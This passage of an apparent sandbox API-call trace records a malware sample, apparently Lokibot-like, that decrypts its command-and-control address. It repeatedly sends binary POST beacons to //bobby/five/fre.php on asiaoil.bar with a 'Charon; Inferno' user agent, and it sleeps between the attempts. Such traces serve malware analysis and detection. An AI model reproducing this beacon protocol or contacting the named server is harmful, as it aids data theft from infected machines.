Flags=0x0, Size=0x3e) returned 0x7639c8 [0316.796] GetProcessHeap () returned 0x740000 [0316.796] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0316.796] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0316.797] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0316.797] GetProcessHeap () returned 0x740000 [0316.797] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0316.797] GetProcessHeap () returned 0x740000 [0316.798] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0316.798] send (s=0x324, buf=0x747928*, len=243, flags=0) returned 243 [0316.798] send (s=0x324, buf=0x761fd0*, len=159, flags=0) returned 159 [0316.798] GetProcessHeap () returned 0x740000 [0316.798] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0316.798] recv (in: s=0x324, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0316.886] GetProcessHeap () returned 0x740000 [0316.887] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0316.887] GetProcessHeap () returned 0x740000 [0316.887] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7639c8 | out: hHeap=0x740000) returned 1 [0316.887] GetProcessHeap () returned 0x740000 [0316.888] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0316.888] GetProcessHeap () returned 0x740000 [0316.888] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cf68 | out: hHeap=0x740000) returned 1 [0316.888] closesocket (s=0x324) returned 0 [0316.889] GetProcessHeap () returned 0x740000 [0316.889] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b600 | out: hHeap=0x740000) returned 1 [0316.889] GetProcessHeap () returned 0x740000 [0316.889] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0316.889] GetProcessHeap () returned 0x740000 [0316.889] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0316.889] GetProcessHeap () returned 0x740000 [0316.890] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0316.890] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1178) returned 0x324 [0316.891] Sleep (dwMilliseconds=0xea60) [0316.893] GetProcessHeap () returned 0x740000 [0316.893] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7637d0 [0316.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.903] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0316.913] GetProcessHeap () returned 0x740000 [0316.913] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0316.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.915] CryptImportKey (in: hProv=0x75d980, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0316.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.916] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.916] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.917] GetProcessHeap () returned 0x740000 [0316.917] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0316.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.918] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7637d0, pdwDataLen=0x19fcfc | out: pbData=0x7637d0, pdwDataLen=0x19fcfc) returned 1 [0316.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.919] CryptDestroyKey (hKey=0x74d768) returned 1 [0316.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.920] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0316.920] GetProcessHeap () returned 0x740000 [0316.920] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0316.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.945] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.946] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.947] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.948] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.948] GetProcessHeap () returned 0x740000 [0316.948] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c098 [0316.948] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0316.948] GetProcessHeap () returned 0x740000 [0316.949] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c098 | out: hHeap=0x740000) returned 1 [0316.949] GetProcessHeap () returned 0x740000 [0316.949] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0316.949] GetProcessHeap () returned 0x740000 [0316.949] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7637d0 | out: hHeap=0x740000) returned 1 [0316.949] GetProcessHeap () returned 0x740000 [0316.950] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0316.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.951] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.959] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0316.968] GetProcessHeap () returned 0x740000 [0316.968] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0316.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.969] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0316.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.971] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.972] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.972] GetProcessHeap () returned 0x740000 [0316.972] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0316.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.973] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0316.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.974] CryptDestroyKey (hKey=0x74d768) returned 1 [0316.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.975] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0316.975] GetProcessHeap () returned 0x740000 [0316.975] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0316.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.977] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0316.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.978] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0316.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.979] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0316.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.980] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0316.980] GetProcessHeap () returned 0x740000 [0316.980] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0316.980] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0317.064] GetProcessHeap () returned 0x740000 [0317.064] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0317.064] socket (af=2, type=1, protocol=6) returned 0x328 [0317.064] connect (s=0x328, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0317.088] FreeAddrInfoW (pAddrInfo=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0317.088] GetProcessHeap () returned 0x740000 [0317.088] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d540 [0317.089] GetProcessHeap () returned 0x740000 [0317.089] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0317.089] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0317.090] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0317.090] GetProcessHeap () returned 0x740000 [0317.090] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0317.090] GetProcessHeap () returned 0x740000 [0317.091] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0317.091] GetProcessHeap () returned 0x740000 [0317.091] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0317.091] GetProcessHeap () returned 0x740000 [0317.092] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0317.092] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0317.093] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0317.093] GetProcessHeap () returned 0x740000 [0317.093] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0317.093] GetProcessHeap () returned 0x740000 [0317.093] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0317.094] send (s=0x328, buf=0x747928*, len=243, flags=0) returned 243 [0317.094] send (s=0x328, buf=0x761fd0*, len=159, flags=0) returned 159 [0317.094] GetProcessHeap () returned 0x740000 [0317.094] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0317.094] recv (in: s=0x328, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 561 [0317.204] GetProcessHeap () returned 0x740000 [0317.204] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0317.205] GetProcessHeap () returned 0x740000 [0317.205] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0317.205] GetProcessHeap () returned 0x740000 [0317.206] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0317.206] GetProcessHeap () returned 0x740000 [0317.207] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d540 | out: hHeap=0x740000) returned 1 [0317.207] closesocket (s=0x328) returned 0 [0317.207] GetProcessHeap () returned 0x740000 [0317.207] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0317.207] GetProcessHeap () returned 0x740000 [0317.208] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0317.208] GetProcessHeap () returned 0x740000 [0317.208] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0317.208] GetProcessHeap () returned 0x740000 [0317.209] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0317.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x114c) returned 0x328 [0317.210] Sleep (dwMilliseconds=0xea60) [0317.215] GetProcessHeap () returned 0x740000 [0317.215] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763980 [0317.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.216] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.225] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0317.232] GetProcessHeap () returned 0x740000 [0317.232] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0317.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.233] CryptImportKey (in: hProv=0x75d980, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0317.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.234] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.234] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.235] GetProcessHeap () returned 0x740000 [0317.235] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0317.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.236] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763980, pdwDataLen=0x19fcfc | out: pbData=0x763980, pdwDataLen=0x19fcfc) returned 1 [0317.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.237] CryptDestroyKey (hKey=0x74d368) returned 1 [0317.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.238] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0317.238] GetProcessHeap () returned 0x740000 [0317.238] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0317.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.239] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.240] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.241] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.242] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.242] GetProcessHeap () returned 0x740000 [0317.242] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c070 [0317.242] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0317.242] GetProcessHeap () returned 0x740000 [0317.243] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c070 | out: hHeap=0x740000) returned 1 [0317.243] GetProcessHeap () returned 0x740000 [0317.243] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0317.243] GetProcessHeap () returned 0x740000 [0317.244] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763980 | out: hHeap=0x740000) returned 1 [0317.244] GetProcessHeap () returned 0x740000 [0317.244] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7636f8 [0317.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.294] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.299] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d430) returned 1 [0317.305] GetProcessHeap () returned 0x740000 [0317.305] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0317.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.306] CryptImportKey (in: hProv=0x75d430, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0317.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.307] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.307] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.307] GetProcessHeap () returned 0x740000 [0317.308] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0317.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.309] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7636f8, pdwDataLen=0x19fcfc | out: pbData=0x7636f8, pdwDataLen=0x19fcfc) returned 1 [0317.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.310] CryptDestroyKey (hKey=0x74d768) returned 1 [0317.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.311] CryptReleaseContext (hProv=0x75d430, dwFlags=0x0) returned 1 [0317.311] GetProcessHeap () returned 0x740000 [0317.311] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0317.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.312] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0317.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.313] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0317.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.314] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0317.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.315] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0317.315] GetProcessHeap () returned 0x740000 [0317.315] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdf0 [0317.315] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0317.316] GetProcessHeap () returned 0x740000 [0317.316] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b670 [0317.316] socket (af=2, type=1, protocol=6) returned 0x32c [0317.317] connect (s=0x32c, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0317.342] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0317.342] GetProcessHeap () returned 0x740000 [0317.342] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0317.342] GetProcessHeap () returned 0x740000 [0317.342] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0317.343] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0317.344] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0317.344] GetProcessHeap () returned 0x740000 [0317.344] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0317.344] GetProcessHeap () returned 0x740000 [0317.345] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0317.345] GetProcessHeap () returned 0x740000 [0317.345] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d70 [0317.345] GetProcessHeap () returned 0x740000 [0317.345] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0317.346] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0317.346] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 